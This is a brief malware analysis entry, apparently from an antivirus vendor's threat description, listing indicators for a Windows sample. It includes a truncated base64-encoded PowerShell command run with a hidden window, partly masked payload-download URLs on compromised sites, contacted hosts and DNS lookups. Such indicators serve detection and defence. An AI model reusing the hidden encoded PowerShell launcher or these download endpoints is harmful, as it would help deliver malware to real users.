Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABaAGkAMwAwAHcAcQBtAD0AKAAnAFQAegAnACsAKAAnADcAcAAnACsAJwBkACcAKQArACcAcwBuACcAKQA7AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBwAHIAbw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\944695.cvr
- 'ho###onnect.com':80
- 'ks##o.com':80
- 'tr###alls.com':443
- '23####wingco.com':80
- 'me#####alacegate.com':80
- 'me#####alacegate.com':443
- http://ho###onnect.com/cgi-bin/v3DD/
- http://ks##o.com/wp-admin/NvruA/
- http://23####wingco.com/wp-includes/gwUy/
- http://me#####alacegate.com/cgi-bin/G/
- 'tr###alls.com':443
- 'me#####alacegate.com':443
- DNS ASK ho###onnect.com
- DNS ASK ca####taccuracy.com
- DNS ASK ks##o.com
- DNS ASK tr###alls.com
- DNS ASK ra###vastra.com
- DNS ASK 23####wingco.com
- DNS ASK me#####alacegate.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABaAGkAMwAwAHcAcQBtAD0AKAAnAFQAegAnACsAKAAnADcAcAAnACsAJwBkACcAKQArACcAcwBuACcAKQA7AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBwAHIAbw...' (со скрытым окном)